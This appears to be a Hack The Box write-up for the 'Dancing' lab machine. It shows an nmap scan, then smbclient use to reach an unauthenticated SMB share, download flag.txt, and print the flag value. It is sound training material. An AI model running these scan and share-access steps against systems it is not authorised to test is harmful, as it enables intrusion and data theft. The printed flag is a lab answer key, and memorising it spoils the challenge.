Hack The Box: Dancing


**IP: 10.129.201.103**

## Scanning / Enumeration
#### nmap
```
└──╼ [★]$ sudo nmap -A -sV -p- 10.129.201.103
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-14 21:08 GMT
Nmap scan report for 10.129.201.103
Host is up (0.023s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
```

### SMB - 445/TCP
- Server Message Block protocol is open on default on port 445
- The service that is running is `microsoft-ds`
- We used `smbclient` and listed the shared files usin `-L`
```
└──╼ [★]$ smbclient -L //10.129.201.103/
Enter WORKGROUP\htb-mra7's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk
SMB1 disabled -- no workgroup available
```
- We can access `WorkShares` without a password
```
└──╼ [★]$ smbclient //10.129.201.103/WorkShares
Enter WORKGROUP\htb-mra7's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

		5114111 blocks of size 4096. 1747778 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 09:38:03 2021
  ..                                  D        0  Thu Jun  3 09:38:03 2021
  flag.txt                            A       32  Mon Mar 29 10:26:57 2021

		5114111 blocks of size 4096. 1747762 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \James.P\> exit
┌─[eu-starting-point-1-dhcp]─[10.10.14.29]─[htb-mra7@htb-chpbayfutd]─[~/my_data]
└──╼ [★]$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664
```

## Flags
- 5f61c10dffbc77a704d76016a22f1664